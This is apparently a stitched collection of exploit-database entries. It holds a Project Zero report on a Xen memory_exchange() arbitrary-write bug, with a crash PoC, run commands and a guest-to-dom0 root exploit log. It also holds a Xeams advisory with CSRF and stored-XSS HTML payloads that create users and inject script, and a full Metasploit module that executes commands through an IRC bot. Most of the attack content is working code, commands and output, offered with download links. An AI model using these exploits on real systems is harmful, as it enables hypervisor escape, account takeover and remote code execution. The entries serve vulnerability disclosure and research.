(XEN) ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level)
(XEN) ACPI: IRQ0 used by override.
(XEN) ACPI: IRQ2 used by override.
(XEN) ACPI: IRQ9 used by override.
(XEN) Enabling APIC mode: Flat. Using 1 I/O APICs
(XEN) ERST table was not found
(XEN) Using ACPI (MADT) for SMP configuration information
(XEN) SMP: Allowing 1 CPUs (0 hotplug CPUs)
(XEN) IRQ limits: 24 GSI, 184 MSI/MSI-X
(XEN) Not enabling x2APIC: depends on iommu_supports_eim.
(XEN) xstate: size: 0x440 and states: 0x7
(XEN) CPU0: No MCE banks present. Machine check support disabled
(XEN) Using scheduler: SMP Credit Scheduler (credit)
(XEN) Platform timer is 3.579MHz ACPI PM Timer
(XEN) Detected 2807.850 MHz processor.
(XEN) Initing memory sharing.
(XEN) alt table ffff82d0802bcf38 -> ffff82d0802be594
(XEN) I/O virtualisation disabled
(XEN) nr_sockets: 1
(XEN) ENABLING IO-APIC IRQs
(XEN) -> Using new ACK method
(XEN) ..TIMER: vector=0xF0 apic1=0 pin1=2 apic2=-1 pin2=-1
(XEN) Allocated console ring of 16 KiB.
(XEN) Brought up 1 CPUs
(XEN) build-id: cd504b2b380e2fe1265376aa845a404b9eb86982
(XEN) CPUIDLE: disabled due to no HPET. Force enable with 'cpuidle'.
(XEN) ACPI sleep modes: S3
(XEN) VPMU: disabled
(XEN) xenoprof: Initialization failed. Intel processor family 6 model 78is not supported
(XEN) Dom0 has maximum 208 PIRQs
(XEN) NX (Execute Disable) protection active
(XEN) *** LOADING DOMAIN 0 ***
(XEN) Xen kernel: 64-bit, lsb, compat32
(XEN) Dom0 kernel: 64-bit, PAE, lsb, paddr 0x1000000 -> 0x1f5a000
(XEN) PHYSICAL MEMORY ARRANGEMENT:
(XEN) Dom0 alloc.: 0000000118000000->000000011a000000 (989666 pages to be allocated)
(XEN) Init. ramdisk: 000000011ed74000->000000011ffff3b5
(XEN) VIRTUAL MEMORY ARRANGEMENT:
(XEN) Loaded kernel: ffffffff81000000->ffffffff81f5a000
(XEN) Init. ramdisk: 0000000000000000->0000000000000000
(XEN) Phys-Mach map: 0000008000000000->00000080007a6370
(XEN) Start info: ffffffff81f5a000->ffffffff81f5a4b4
(XEN) Page tables: ffffffff81f5b000->ffffffff81f6e000
(XEN) Boot stack: ffffffff81f6e000->ffffffff81f6f000
(XEN) TOTAL: ffffffff80000000->ffffffff82000000
(XEN) ENTRY ADDRESS: ffffffff81d38180
(XEN) Dom0 has maximum 1 VCPUs
(XEN) Scrubbing Free RAM on 1 nodes using 1 CPUs
(XEN) ....................................done.
(XEN) Initial low memory virq threshold set at 0x4000 pages.
(XEN) Std. Loglevel: All
(XEN) Guest Loglevel: Nothing (Rate-limited: Errors and warnings)
(XEN) *** Serial input -> DOM0 (type 'CTRL-a' three times to switch input to Xen)
(XEN) Freed 312kB init memory
mapping kernel into physical memory
about to get started...
(XEN) d0 attempted to change d0v0's CR4 flags 00000620 -> 00040660
(XEN) PCI add device 0000:00:00.0
(XEN) PCI add device 0000:00:01.0
(XEN) PCI add device 0000:00:01.1
(XEN) PCI add device 0000:00:02.0
(XEN) PCI add device 0000:00:03.0
(XEN) PCI add device 0000:00:04.0
(XEN) PCI add device 0000:00:05.0
(XEN) PCI add device 0000:00:06.0
(XEN) PCI add device 0000:00:07.0
(XEN) PCI add device 0000:00:08.0
(XEN) PCI add device 0000:00:0d.0
Debian GNU/Linux 9 xenhost hvc0
xenhost login: (XEN) d1 attempted to change d1v0's CR4 flags 00000620 -> 00040660
(XEN) d1 attempted to change d1v1's CR4 flags 00000620 -> 00040660
(XEN) *** DOUBLE FAULT ***
(XEN) ----[ Xen-4.8.1 x86_64 debug=n Not tainted ]----
(XEN) CPU: 0
(XEN) RIP: e008:[<ffff82d08017962a>] free_page_type+0xea/0x630
(XEN) RFLAGS: 0000000000010206 CONTEXT: hypervisor
(XEN) rax: 000000000000a3db rbx: ffff82e000147b60 rcx: 0000000000000000
(XEN) rdx: ffff830000000000 rsi: 4000000000000000 rdi: 000000000000a3db
(XEN) rbp: 4400000000000001 rsp: ffff8300dfce5ff8 r8: ffff8300dfce7fff
(XEN) r9: ffff82d0802f2980 r10: 0000000000000000 r11: 0000000000000202
(XEN) r12: 000000000000a3db r13: ffff83011fd74000 r14: ffff83011fd74000
(XEN) r15: 0000000000000000 cr0: 000000008005003b cr4: 00000000000406a0
(XEN) cr3: 000000000702d000 cr2: ffff8300dfce5fe8
(XEN) ds: 0000 es: 0000 fs: 0000 gs: 0000 ss: e010 cs: e008
(XEN) Valid stack range: ffff8300dfce6000-ffff8300dfce8000, sp=ffff8300dfce5ff8, tss.esp0=ffff8300dfce7fc0
(XEN) Xen stack overflow (dumping trace ffff8300dfce6000-ffff8300dfce8000):
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d08016af21>] io_apic.c#ack_edge_ioapic_irq+0x11/0x60
(XEN) [<ffff82d08016af21>] io_apic.c#ack_edge_ioapic_irq+0x11/0x60
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d0801793ae>] mm.c#get_page_from_pagenr+0x4e/0x60
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d0801768e9>] is_iomem_page+0x9/0x70
(XEN) [<ffff82d08010baec>] grant_table.c#__gnttab_unmap_common_complete+0x17c/0x360
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080146684>] serial_tx_interrupt+0xe4/0x120
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017234a>] do_IRQ+0x22a/0x660
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080237f6f>] common_interrupt+0x5f/0x70
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d08017a028>] put_page_from_l1e+0xb8/0x130
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d08017a28a>] mm.c#put_page_from_l2e+0x7a/0x190
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d0801793ae>] mm.c#get_page_from_pagenr+0x4e/0x60
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d0801791e3>] get_page+0x13/0xf0
(XEN) [<ffff82d080183056>] do_mmuext_op+0x1056/0x1500
(XEN) [<ffff82d080182000>] do_mmuext_op+0/0x1500
(XEN) [<ffff82d080169c96>] pv_hypercall+0xf6/0x1c0
(XEN) [<ffff82d08019bea3>] do_page_fault+0x163/0x4c0
(XEN) [<ffff82d080237abe>] entry.o#test_all_events+0/0x2a
(XEN)
(XEN)
(XEN) ****************************************
(XEN) Panic on CPU 0:
(XEN) DOUBLE FAULT -- system shutdown
(XEN) ****************************************
(XEN)
(XEN) Reboot in five seconds...
==============================
This PoC just causes a DoS, but as far as I can tell, Xen only uses
guard pages for the stack (via memguard_guard_stack()) in debug builds,
which would mean that this is a potentially exploitable issue in release builds.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43014.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1184
This bug report describes a vulnerability in memory_exchange() that
permits PV guest kernels to write to an arbitrary virtual address with
hypervisor privileges. The vulnerability was introduced through a
broken fix for CVE-2012-5513 / XSA-29.
The fix for CVE-2012-5513 / XSA-29 introduced the following check in
the memory_exchange() hypercall handler:
if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||
!guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )
{
rc = -EFAULT;
goto fail_early;
}
guest_handle_okay() calls array_access_ok(), which calls access_ok(),
which is implemented as follows:
/*
* Valid if in +ve half of 48-bit address space, or above
* Xen-reserved area.
* This is also valid for range checks (addr, addr+size). As long
* as the start address is outside the Xen-reserved area then we
* will access a non-canonical address (and thus fault) before
* ever reaching VIRT_START.
*/
#define __addr_ok(addr) \
(((unsigned long)(addr) < (1UL<<47)) || \
((unsigned long)(addr) >= HYPERVISOR_VIRT_END))
#define access_ok(addr, size) \
(__addr_ok(addr) || is_compat_arg_xlat_range(addr, size))
As the comment states, access_ok() only checks the address, not the
size, if the address points to guest memory, based on the assumption
that any caller of access_ok() will access guest memory linearly,
starting at the supplied address. Callers that want to access a
subrange of the memory referenced by a guest handle are supposed to
use guest_handle_subrange_okay(), which takes an additional start
offset parameter, instead of guest_handle_okay().
memory_exchange() uses guest_handle_okay(), but only accesses the
guest memory arrays referenced by exch.in.extent_start and
exch.out.extent_start starting at exch.nr_exchanged, a 64-bit offset.
The intent behind exch.nr_exchanged is that guests always set it to 0
and nonzero values are only set when a hypercall has to be restarted
because of preemption, but this isn't enforced.
Therefore, by invoking this hypercall with crafted arguments, it is
possible to write to an arbitrary memory location that is encoded as
exch.out.extent_start + 8 * exch.nr_exchanged
where exch.out.extent_start points to guest memory and
exch.nr_exchanged is an attacker-chosen 64-bit value.
I have attached a proof of concept. This PoC demonstrates the issue by
overwriting the first 8 bytes of the IDT entry for #PF, causing the
next pagefault to doublefault. To run the PoC, unpack it in a normal
64-bit PV domain and run the following commands in the domain as root:
root@pv-guest:~# cd crashpoc
root@pv-guest:~/crashpoc# make -C /lib/modules/$(uname -r)/build M=$(pwd)
make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic'
LD /root/crashpoc/built-in.o
CC [M] /root/crashpoc/module.o
nasm -f elf64 -o /root/crashpoc/native.o /root/crashpoc/native.asm
LD [M] /root/crashpoc/test.o
Building modules, stage 2.
MODPOST 1 modules
WARNING: could not find /root/crashpoc/.native.o.cmd for /root/crashpoc/native.o
CC /root/crashpoc/test.mod.o
LD [M] /root/crashpoc/test.ko
make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic'
root@pv-guest:~/crashpoc# insmod test.ko
root@pv-guest:~/crashpoc# rmmod test
The machine on which I tested the PoC was running Xen 4.6.0-1ubuntu4
(from Ubuntu 16.04.2). Executing the PoC caused the following console
output:
(XEN) *** DOUBLE FAULT ***
(XEN) ----[ Xen-4.6.0 x86_64 debug=n Tainted: C ]----
(XEN) CPU: 0
(XEN) RIP: e033:[<0000557b46f56860>] 0000557b46f56860
(XEN) RFLAGS: 0000000000010202 CONTEXT: hypervisor
(XEN) rax: 00007fffe9cfafd0 rbx: 00007fffe9cfd160 rcx: 0000557b47ebd040
(XEN) rdx: 0000000000000001 rsi: 0000000000000004 rdi: 0000557b47ec52e0
(XEN) rbp: 00007fffe9cfd158 rsp: 00007fffe9cfaf30 r8: 0000557b46f7df00
(XEN) r9: 0000557b46f7dec0 r10: 0000557b46f7df00 r11: 0000557b47ec5878
(XEN) r12: 0000557b47ebd040 r13: 00007fffe9cfb0c0 r14: 0000557b47ec52e0
(XEN) r15: 0000557b47ed5e70 cr0: 0000000080050033 cr4: 00000000001506a0
(XEN) cr3: 0000000098e2e000 cr2: 00007fffe9cfaf93
(XEN) ds: 0000 es: 0000 fs: 0000 gs: 0000 ss: e02b cs: e033
(XEN)
(XEN) ****************************************
(XEN) Panic on CPU 0:
(XEN) DOUBLE FAULT -- system shutdown
(XEN) ****************************************
(XEN)
(XEN) Reboot in five seconds...
I strongly recommend changing the semantics of access_ok() so that it
guarantees that any access to an address inside the specified range is
valid. Alternatively, add some prefix, e.g. "UNSAFE_", to the names of
access_ok() and appropriate wrappers to prevent people from using
these functions improperly. Currently, in my opinion, the function
name access_ok() is misleading.
Proof of Concept: xen_memory_exchange_crashpoc.tar
################################################################################
I have written an exploit (attached).
Usage (in an unprivileged PV guest with kernel headers, gcc, make, nasm and hexdump):
root@pv-guest:~/privesc_poc# ./compile.sh
make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic'
LD /root/privesc_poc/built-in.o
CC [M] /root/privesc_poc/module.o
nasm -f elf64 -o /root/privesc_poc/native.o /root/privesc_poc/native.asm
LD [M] /root/privesc_poc/test.o
Building modules, stage 2.
MODPOST 1 modules
WARNING: could not find /root/privesc_poc/.native.o.cmd for /root/privesc_poc/native.o
CC /root/privesc_poc/test.mod.o
LD [M] /root/privesc_poc/test.ko
make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic'
root@pv-guest:~/privesc_poc# ./attack 'id > /tmp/owned_by_the_guest'
press enter to continue
<press enter>
root@pv-guest:~/privesc_poc#
dmesg in the unprivileged PV guest:
[ 721.413415] call_int_85 at 0xffffffffc0075a90
[ 721.420167] backstop_85_handler at 0xffffffffc0075a93
[ 722.801566] PML4 at ffff880002fe3000
[ 722.808216] PML4 entry: 0x13bba4067
[ 722.816161] ### trying to write crafted PUD entry...
[ 722.824178] ### writing byte 0
[ 722.832193] write_byte_hyper(ffff88007a491008, 0x7)
[ 722.840254] write_byte_hyper successful
[ 722.848234] ### writing byte 1
[ 722.856170] write_byte_hyper(ffff88007a491009, 0x80)
[ 722.864219] write_byte_hyper successful
[ 722.872241] ### writing byte 2
[ 722.880215] write_byte_hyper(ffff88007a49100a, 0x35)
[ 722.889014] write_byte_hyper successful
[ 722.896232] ### writing byte 3
[ 722.904265] write_byte_hyper(ffff88007a49100b, 0x6)
[ 722.912599] write_byte_hyper successful
[ 722.920246] ### writing byte 4
[ 722.928270] write_byte_hyper(ffff88007a49100c, 0x0)
[ 722.938554] write_byte_hyper successful
[ 722.944231] ### writing byte 5
[ 722.952239] write_byte_hyper(ffff88007a49100d, 0x0)
[ 722.961769] write_byte_hyper successful
[ 722.968221] ### writing byte 6
[ 722.976219] write_byte_hyper(ffff88007a49100e, 0x0)
[ 722.984319] write_byte_hyper successful
[ 722.992233] ### writing byte 7
[ 723.000234] write_byte_hyper(ffff88007a49100f, 0x0)
[ 723.008341] write_byte_hyper successful
[ 723.016254] ### writing byte 8
[ 723.024357] write_byte_hyper(ffff88007a491010, 0x0)
[ 723.032254] write_byte_hyper successful
[ 723.040236] ### crafted PUD entry written
[ 723.048199] dummy
[ 723.056199] going to link PMD into target PUD
[ 723.064238] linked PMD into target PUD
[ 723.072206] going to unlink mapping via userspace PUD
[ 723.080230] mapping unlink done
[ 723.088251] copying HV and user shellcode...
[ 723.096283] copied HV and user shellcode
[ 723.104270] int 0x85 returned 0x7331
[ 723.112237] remapping paddr 0x13bb86000 to vaddr 0xffff88000355a800
[ 723.120192] IDT entry for 0x80 should be at 0xffff83013bb86800
[ 723.128226] remapped IDT entry for 0x80 to 0xffff804000100800
[ 723.136260] IDT entry for 0x80: addr=0xffff82d08022a3d0, selector=0xe008, ist=0x0, p=1, dpl=3, s=0, type=15
[ 723.144291] int 0x85 returned 0x1337
[ 723.152235] === END ===
The supplied shell command executes in dom0 (and all other 64bit PV domains):
root@ubuntu:~# cat /tmp/owned_by_the_guest
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~#
Note that the exploit doesn't clean up after itself - shutting down the attacking domain will panic the hypervisor.
I have tested the exploit in the following configurations:
configuration 1:
running inside VMware Workstation
Xen version "Xen version 4.6.0 (Ubuntu 4.6.0-1ubuntu4.3)"
dom0: Ubuntu 16.04.2, Linux 4.8.0-41-generic #44~16.04.1-Ubuntu
unprivileged guest: Ubuntu 16.04.2, Linux 4.4.0-66-generic #87-Ubuntu
configuration 2:
running on a physical machine with Qubes OS 3.1 installed
Xen version 4.6.3
Proof of Concept: privesc_poc.tar.gz
################################################################################
Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41870.zip
# Exploit Title: Multiple vulnerabilities in Xeams 4.5 Build 5755 (CSRF/Stored XSS)
# Date: 07-05-2015
# Exploit Author: Marlow Tannhauser
# Contact: marlowtannhauser@gmail.com
# Vendor Homepage: http://www.synametrics.com
# Software Link: http://web.synametrics.com/XeamsDownload.htm
# Version: 4.5 Build 5755. Earlier versions may also be affected.
# CVE: 2015-3141 (Xeams)
# Category: Web apps
# DISCLOSURE TIMELINE #
08/02/2015: Initial disclosure to vendor and CERT
09/02/2015: Acknowledgment of vulnerabilities from vendor
11/02/2015: Disclosure deadline of 01/03/2015 agreed with vendor
19/02/2015: Disclosure deadline renegotiated to 01/04/2015 at vendor's request
09/04/2015: Disclosure deadline renegotiated to 20/04/2015 at vendor's request
20/04/2015: Confirmation of fix from vendor
07/05/2015: Disclosure
Note that the CVE-ID is for the CSRF vulnerability only. No CVE-ID has been generated for the stored XSS vulnerabilities. The vulnerable version of the product is no longer available for download from the vendor's webpage. Note also that this is a different vulnerability from CVE 2012-2569.
# EXPLOIT DESCRIPTION #
Xeams 4.5 Build 5755 is vulnerable to CSRF attacks, which can also be combined with stored XSS attacks (authenticated administrators only). The JSESSIONID created when a user logs on to the system is persistent and does not change across requests.
# POC 1 #
The following PoC uses the CSRF vulnerability to create a new SMTP domain in the application, and combines it with one of the stored XSS vulnerabilities.
<html>
<img src="http://192.168.0.8:5272/FrontController?domainname=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&operation=160" alt="" width="1" height="1">
</html>
# POC 2 #
The following PoC uses the CSRF vulnerability to create a new user with the details shown.
<html>
<img src="http://192.168.1.67:5272/FrontController?txtEmail=marlow@marlow.com&txtPwd=marlow&txtPwd1=marlow&chkActivate=on&chkNotify=on&reportTime_0=0&reportTime_1=- 1&reportTime_2=- 1&reportTime_3=- 1&reportTime_4=- 1&chkServerHost=192.168.1.67&SaveAndClose=Save&operation=504" alt="" width="1" height="1">
</html>
# STORED XSS VULNERABILITIES #
Stored XSS vulnerabilities are present in the following fields:
Server Configuration > SMTP Configuration > Domain Configuration > New domain name field
Example URL: http://192.168.0.8:5272/FrontController?domainname=%3Cscript%3Ealert%28%22ONE%22%29%3C%2Fscript%3E&operation=160#tab2
Server Configuration > Manage Forwarders > Add a new forwarder > Recipient's address
Example URL: http://192.168.0.8:5272/FrontController?txtRecipient=%3Cscript%3Ealert%28%22THREE%22%29%3C%2Fscript%3E&txtIPAddress=127.0.0.1&chkGoodOnly=on&operation=130
Server Configuration > Manage POP3 Fetcher > New Account > POP3 Server field, User Name field, and Recipient field
Example URL: http://192.168.0.8:5272/FrontController?popFetchServer=%3Cscript%3Ealert%28%22XSS1%22%29%3C%2Fscript%3E&popFetchUser=%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E&popFetchPwd=password&popFetchRecipient=%3Cscript%3Ealert%28%22XSS3%22%29%3C%2Fscript%3E&popFetchCount=0&operation=73&index=-1
Server Configuration > Server Configuration > Advanced Configuration > Smtp HELO domain [XSS is displayed in Tools > About Xeams]
Example URL: POST request
# MITIGATION #
Upgrade to the latest build of Xeams, available from the link shown.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution',
'Description' => %q{
This module allows remote command execution on an IRC Bot developed by xdh.
This perl bot was caught by Conor Patrick with his shellshock honeypot server
and is categorized by Markus Zanke as an fBot (Fire & Forget - DDoS Bot). Matt
Thayer also found this script which has a description of LinuxNet perlbot.
The bot answers only based on the servername and nickname in the IRC message
which is configured on the perl script thus you need to be an operator on the IRC
network to spoof it and in order to exploit this bot or have at least the same ip
to the config.
},
'Author' =>
[
#MalwareMustDie
'Jay Turla', # msf
'Conor Patrick', # initial discovery and botnet analysis for xdh
'Matt Thayer' # initial discovery for LinuxNet perlbot
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://conorpp.com/blog/a-close-look-at-an-operating-botnet/' ],
[ 'URL', 'https://twitter.com/MrMookie/status/673389285676965889' ], # Matt's discovery
[ 'URL', 'https://www.alienvault.com/open-threat-exchange/blog/elasticzombie-botnet-exploiting-elasticsearch-vulnerabilities' ] # details of what an fBot is
],
'Platform' => %w{ unix win },
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'Targets' =>
[
[ 'xdh Botnet / LinuxNet perlbot', { } ]
],
'Privileged' => false,
'DisclosureDate' => 'Dec 04 2015',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(6667),
OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
OptString.new('NICK', [true, 'IRC Nickname', 'msfuser']), # botnet administrator name
OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
], self.class)
end
def check
connect
res = register(sock)
if res =~ /463/ || res =~ /464/
vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
return Exploit::CheckCode::Unknown
end
res = join(sock)
if !res =~ /353/ && !res =~ /366/
vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
return Exploit::CheckCode::Unknown
end
quit(sock)
disconnect
if res =~ /auth/ && res =~ /logged in/
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def send_msg(sock, data)
sock.put(data)
data = ""
begin
read_data = sock.get_once(-1, 1)
while !read_data.nil?
data << read_data
read_data = sock.get_once(-1, 1)
end
rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
end
data
end
def register(sock)
msg = ""
if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?
msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
end
if datastore['NICK'].length > 9
nick = rand_text_alpha(9)
print_error("The nick is longer than 9 characters, using #{nick}")
else
nick = datastore['NICK']
end
msg << "NICK #{nick}\r\n"
msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
send_msg(sock,msg)
end
def join(sock)
join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
send_msg(sock, join_msg)
end
def xdh_command(sock)
encoded = payload.encoded
command_msg = "PRIVMSG #{datastore['CHANNEL']} :.say #{encoded}\r\n"
send_msg(sock, command_msg)
end
def quit(sock)
quit_msg = "QUIT :bye bye\r\n"
sock.put(quit_msg)
end
def exploit
connect
print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
res = register(sock)
if res =~ /463/ || res =~ /464/
print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
return
end
print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
res = join(sock)
if !res =~ /353/ && !res =~ /366/
print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
return
end
print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...")
xdh_command(sock)
quit(sock)
disconnect
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
